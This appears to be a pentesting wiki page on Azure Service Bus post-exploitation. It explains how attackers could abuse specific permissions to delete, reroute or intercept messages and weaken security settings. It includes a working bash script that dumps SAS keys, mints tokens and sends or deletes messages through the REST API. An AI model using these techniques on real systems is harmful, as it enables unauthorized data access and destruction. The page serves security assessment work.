Az - Service Bus Post Exploitation
For more information check:
Az - Service Bus
Microsoft.ServiceBus/namespaces/Delete
An attacker with this permission can delete an entire Azure Service Bus namespace. This action removes the namespace and all associated resources, including queues, topics, subscriptions, and their messages, causing widespread disruption and permanent data loss across all dependent systems and workflows.
Microsoft.ServiceBus/namespaces/topics/Delete
An attacker with this permission can delete an Azure Service Bus topic. This action removes the topic and all its associated subscriptions and messages, potentially causing loss of critical data and disrupting systems and workflows relying on the topic.
Microsoft.ServiceBus/namespaces/queues/Delete
An attacker with this permission can delete an Azure Service Bus queue. This action removes the queue and all the messages within it, potentially causing loss of critical data and disrupting systems and workflows dependent on the queue.
Microsoft.ServiceBus/namespaces/topics/subscriptions/Delete
An attacker with this permission can delete an Azure Service Bus subscription. This action removes the subscription and all its associated messages, potentially disrupting workflows, data processing, and system operations relying on the subscription.
Microsoft.ServiceBus/namespaces/write & Microsoft.ServiceBus/namespaces/read
An attacker with permissions to create or modify Azure Service Bus namespaces can exploit this to disrupt operations, deploy unauthorized resources, or expose sensitive data. They can alter critical configurations such as enabling public network access, downgrading encryption settings, or changing SKUs to degrade performance or increase costs. They can also toggle local (SAS key) authentication, re-enabling it to regain key-based access where it had been disabled or disabling it to break every SAS-based client, manipulate replica locations, or lower the minimum TLS version to weaken security controls, making namespace misconfiguration a significant post-exploitation risk.
Microsoft.ServiceBus/namespaces/queues/write (& Microsoft.ServiceBus/namespaces/queues/read)
An attacker with permissions to create or modify Azure Service Bus queues (to modify an existing queue you will also need the action Microsoft.ServiceBus/namespaces/queues/read) can exploit this to intercept data, disrupt workflows, or enable unauthorized access. They can alter critical configurations such as auto-forwarding messages to a queue or topic they control (forwarding targets must live in the same namespace, so the attacker first creates one there), adjusting message TTL to retain or discard data improperly, or enabling dead-lettering on expiration to interfere with error handling. Additionally, they could manipulate queue sizes, lock durations, or the entity status (Disabled, SendDisabled, ReceiveDisabled) to disrupt service functionality or evade detection, making this a significant post-exploitation risk.
Microsoft.ServiceBus/namespaces/topics/write (& Microsoft.ServiceBus/namespaces/topics/read)
An attacker with permissions to create or modify topics (to modify an existing topic you will also need the action Microsoft.ServiceBus/namespaces/topics/read) within an Azure Service Bus namespace can exploit this to disrupt message workflows, expose sensitive data, or enable unauthorized actions. Using commands like az servicebus topic update, they can manipulate configurations such as partitioning, TTL settings (retaining or discarding messages improperly), or duplicate detection (removing a control that consumers rely on). Additionally, they could adjust topic size limits, change the status to disrupt availability, or enable express mode so that messages are held in memory before being written to durable storage, making topic management a critical focus for post-exploitation mitigation.
Microsoft.ServiceBus/namespaces/topics/subscriptions/write (& Microsoft.ServiceBus/namespaces/topics/subscriptions/read)
An attacker with permissions to create or modify subscriptions (to modify an existing subscription you will also need the action Microsoft.ServiceBus/namespaces/topics/subscriptions/read) within an Azure Service Bus topic can exploit this to intercept, reroute, or disrupt message workflows. Simply creating a new subscription on a topic delivers a copy of every subsequent message to the attacker. Using commands like az servicebus topic subscription update, they can manipulate configurations such as enabling dead-lettering to divert messages, auto-forwarding messages to a queue or topic they control in the same namespace, or modifying TTL and lock duration to retain or interfere with message delivery. Additionally, they can alter the status or max delivery count to disrupt operations or evade detection, making subscription control a critical aspect of post-exploitation scenarios.
AuthorizationRules
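Authorization rules (shared access policies) on a namespace, queue or topic carry a primary/secondary key pair with Manage, Send and/or Listen rights. Reading those keys is a control-plane action, but the keys themselves grant data-plane access with no further RBAC, and a SAS token minted from them stays valid until the key is regenerated. As an added example that is not code from the original page, the script below dumps a rule's keys with the CLI, derives a Service Bus SAS token from one of them with openssl, and uses the token against the REST API to send and receive. The names (rg-prod, sb-victim, orders, RootManageSharedAccessKey) and the key value are made up. If local authentication has been disabled on the namespace, the token is rejected; the namespaces/write permission above can turn it back on.

```shell
#!/usr/bin/env bash
# Added example, not from the original page. Lists an authorization rule's
# keys, mints a SAS token from a key, and calls the data-plane REST API.
# Names (rg-prod, sb-victim, orders, RootManageSharedAccessKey) and the key
# value are made up. DRY_RUN=1 (default) prints the az command only.
set -eu
DRY_RUN="${DRY_RUN:-1}"
run() { if [ "$DRY_RUN" = "1" ]; then printf '%s\n' "$*"; else "$@"; fi; }

# Control plane: needs Microsoft.ServiceBus/namespaces/authorizationRules/listkeys/action.
# Queue- and topic-scoped rules have matching 'az servicebus queue|topic
# authorization-rule keys list' commands. Output holds primaryKey, secondaryKey
# and ready-made connection strings.
list_keys() {   # $1 rg, $2 namespace, $3 rule name
  run az servicebus namespace authorization-rule keys list -g "$1" --namespace-name "$2" -n "$3"
}

# Percent-encode everything except unreserved characters (ASCII input only).
urlencode() {
  local s="$1" out="" c
  while [ -n "$s" ]; do
    c="${s%"${s#?}"}"; s="${s#?}"
    case "$c" in
      [A-Za-z0-9._~-]) out="$out$c" ;;
      *) out="$out$(printf '%%%02X' "'$c")" ;;
    esac
  done
  printf '%s' "$out"
}

# SAS token: sig = base64(HMAC-SHA256(key, "<encoded resource URI>\n<expiry>")).
# The key is used as raw bytes exactly as the CLI prints it (not base64-decoded).
sas_token() {   # $1 namespace, $2 entity path, $3 rule name, $4 key, $5 expiry (unix time)
  local sr sig
  sr=$(urlencode "https://$1.servicebus.windows.net/$2")
  sig=$(printf '%s\n%s' "$sr" "$5" | openssl dgst -sha256 -hmac "$4" -binary | base64 | tr -d '\n')
  printf 'SharedAccessSignature sr=%s&sig=%s&se=%s&skn=%s' "$sr" "$(urlencode "$sig")" "$5" "$3"
}

# Data plane. A Send-only rule suffices for sb_send; Listen is needed to read.
# For a subscription the entity path is "<topic>/subscriptions/<name>".
sb_send() {            # $1 namespace, $2 entity path, $3 token, $4 body
  curl -sS -X POST "https://$1.servicebus.windows.net/$2/messages" \
    -H "Authorization: $3" -H 'Content-Type: text/plain' --data-binary "$4"
}
sb_peek_lock() {       # non-destructive: locks the head message and returns it
  curl -sS -X POST "https://$1.servicebus.windows.net/$2/messages/head?timeout=30" -H "Authorization: $3"
}
sb_receive_delete() {  # destructive: removes the head message from the entity
  curl -sS -X DELETE "https://$1.servicebus.windows.net/$2/messages/head?timeout=30" -H "Authorization: $3"
}

# Usage: DRY_RUN=1 prints the key-listing command; the token is computed
# locally from the made-up key, so a real namespace would reject it.
list_keys rg-prod sb-victim RootManageSharedAccessKey
if command -v openssl >/dev/null 2>&1; then
  TOKEN=$(sas_token sb-victim orders RootManageSharedAccessKey 'MadeUpPrimaryKeyValue=' "$(( $(date +%s) + 3600 ))")
  printf '%s\n' "$TOKEN"
  # sb_send sb-victim orders "$TOKEN" '{"order":"injected"}'
  # sb_receive_delete sb-victim orders "$TOKEN"
fi
```

Two things worth knowing before using this on an engagement: the key listing itself lands in the Activity Log as a listkeys action on the rule, and a receive-and-delete (DELETE on messages/head) is destructive for the victim, so peek-lock is the option that leaves the queue as it was.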
Send & Receive Messages
Take a look here:
https://github.com/HackTricks-wiki/hacktricks-cloud/blob/master/pentesting-cloud/azure-security/az-services/az-queue-privesc.md
https://learn.microsoft.com/en-us/azure/storage/queues/storage-powershell-how-to-use-queues
https://learn.microsoft.com/en-us/rest/api/storageservices/queue-service-rest-api
https://learn.microsoft.com/en-us/azure/storage/queues/queues-auth-abac-attributes
https://learn.microsoft.com/en-us/azure/service-bus-messaging/service-bus-python-how-to-use-topics-subscriptions?tabs=passwordless
https://learn.microsoft.com/en-us/azure/role-based-access-control/permissions/integration#microsoftservicebus
https://learn.microsoft.com/en-us/cli/azure/servicebus/namespace?view=azure-cli-latest
https://learn.microsoft.com/en-us/cli/azure/servicebus/queue?view=azure-cli-latest